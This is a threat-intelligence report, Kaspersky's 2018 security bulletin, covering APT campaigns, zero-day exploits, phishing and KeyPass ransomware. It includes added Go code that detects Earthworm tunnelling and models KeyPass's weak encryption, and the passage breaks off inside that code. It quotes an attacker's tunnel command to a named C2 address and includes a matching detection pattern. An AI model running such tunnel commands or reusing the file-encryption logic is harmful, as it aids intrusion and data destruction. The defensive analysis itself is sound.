All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity. All the statistics were collected from November 2017 to October 2018.

The year in figures

  • 30.01% of user computers were subjected to at least one Malware-class web attack over the year.
  • Kaspersky Lab solutions repelled 1 876 998 691 attacks launched from online resources located all over the world.
  • 554 159 621 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 21 643 946 unique malicious objects.
  • 765 538 computers of unique users were targeted by encryptors.
  • 5 638 828 computers of unique users were targeted by miners.
  • Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 830 135 devices.

Fill the form below to download the Kaspersky Security Bulletin 2018. Statistics full report (English, PDF):

Kaspersky Security Bulletin 2018. Top security stories

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online, and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018.

Targeted attack campaigns

At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state-affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data center in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.
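The tunneler command quoted above is the kind of artefact a defender can turn into a detection. The following Go program is an added example written for this page, not tooling from Kaspersky Lab or from the report; it scans process-creation records for the reverse-SOCKS argument pattern the report attributes to Earthworm (`-s rssocks -d <host> -e <port>`) and flags whether the destination is the C2 address given above (refanged from the report's `103.75.190[.]28` notation). The log format, the other hosts and the file names are constructed for the example; real Sysmon or EDR output needs a different record split.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one suspicious command line: where it was seen and where it tunnels to.
type Finding struct {
	Line    int
	Image   string
	Host    string
	Port    string
	KnownC2 bool
}

// Earthworm's reverse-SOCKS invocation, as quoted in the report:
// "-s rssocks -d <host> -e <port>". The binary name is deliberately not part of
// the pattern, so a renamed copy of the tool is still caught.
var ewReverseSocks = regexp.MustCompile(`(?i)-s\s+rssocks\s+-d\s+([^\s"']+)\s+-e\s+(\d{1,5})`)

// refang turns the report's defanged notation ("103.75.190[.]28") into a plain address.
func refang(s string) string { return strings.ReplaceAll(s, "[.]", ".") }

// knownC2 is seeded with the one address the report ties to LuckyMouse.
var knownC2 = map[string]bool{refang("103.75.190[.]28"): true}

// scanProcessLogs walks process-creation records in a constructed format:
// "<timestamp> <image path> <command line>" (an assumption for this example).
func scanProcessLogs(records []string) []Finding {
	var out []Finding
	for i, rec := range records {
		parts := strings.SplitN(rec, " ", 3)
		if len(parts) < 3 {
			continue // malformed record, nothing to inspect
		}
		m := ewReverseSocks.FindStringSubmatch(parts[2])
		if m == nil {
			continue
		}
		out = append(out, Finding{
			Line: i + 1, Image: parts[1], Host: m[1], Port: m[2], KnownC2: knownC2[m[1]],
		})
	}
	return out
}

// sampleLogs is constructed for this example; none of these events come from the report.
var sampleLogs = []string{
	"2018-09-03T10:14:02Z C:\\Windows\\System32\\svchost.exe svchost.exe -k netsvcs",
	"2018-09-03T10:15:44Z C:\\ProgramData\\update.exe update.exe -s rssocks -d 103.75.190.28 -e 443",
	"2018-09-03T10:16:10Z C:\\Windows\\System32\\ping.exe ping.exe -n 4 10.0.0.1",
	"2018-09-03T10:17:31Z C:\\Users\\a\\t.exe t.exe -s rssocks -d 198.51.100.7 -e 8443",
}

func main() {
	for _, f := range scanProcessLogs(sampleLogs) {
		tag := "unknown destination, investigate"
		if f.KnownC2 {
			tag = "destination matches a known LuckyMouse C2"
		}
		fmt.Printf("line %d: %s tunnels to %s:%s (%s)\n", f.Line, f.Image, f.Host, f.Port, tag)
	}
}
```

Matching on the argument shape rather than on the binary name or the single address means a renamed tunneler pointed at new infrastructure still surfaces for triage; the known-C2 lookup only raises the priority of the hit.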

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate-looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate-looking site and inject a malicious payload into a ‘legitimate-looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian-language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. FuzzBunch contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre, they allow an attacker to read memory from any process and from its own process respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Browser extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

In the run-up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Traffic on a WPA-protected public hotspot can also be intercepted by an attacker who inserts themselves between the access point and the device at the start of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.
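
As an added illustration, not code from the report or from the malware, the following Go program models the scheme just described (AES-256 in CFB mode, zero IV, one fixed 32-byte key, at most 0x500000 bytes per file) and shows two consequences for recovery: with the hardcoded offline key known, decryption is a single CFB pass, and even without the key, because every file shares the same key and IV, the first 16 bytes of any two encrypted files XOR to the XOR of their plaintexts, so one file with a known header reveals the first block of another. The key and the sample files are constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// Parameters as the text describes them: AES-256 in CFB mode, an all-zero IV, one
// 32-byte key shared by every file, and only the first 0x500000 bytes transformed.
const maxEncrypted = 0x500000

// fixedKey stands in for the hardcoded offline key. This value is constructed for the
// demonstration; it is not the real one.
var fixedKey = []byte("constructed-key-32-bytes-long!!!")

// zeroIV is the IV that makes every file start with the same CFB keystream block.
var zeroIV = make([]byte, aes.BlockSize)

// cfbTransform applies AES-CFB to at most maxEncrypted leading bytes and copies the
// rest through untouched. Encryption and decryption differ only in the direction flag.
func cfbTransform(data, key, iv []byte, decrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	n := len(data)
	if n > maxEncrypted {
		n = maxEncrypted
	}
	out := make([]byte, len(data))
	copy(out, data)
	var stream cipher.Stream
	if decrypt {
		stream = cipher.NewCFBDecrypter(block, iv)
	} else {
		stream = cipher.NewCFBEncrypter(block, iv)
	}
	stream.XORKeyStream(out[:n], data[:n])
	return out, nil
}

// RecoverOffline undoes an encryption performed while the C2 was unreachable: the key
// and IV are known constants, so recovery is one CFB pass.
func RecoverOffline(ciphertext []byte) ([]byte, error) {
	return cfbTransform(ciphertext, fixedKey, zeroIV, true)
}

// RecoverFirstBlock needs no key at all. In CFB the first ciphertext block is
// P1 XOR E_K(IV); with K and IV shared by every file, XORing the first blocks of two
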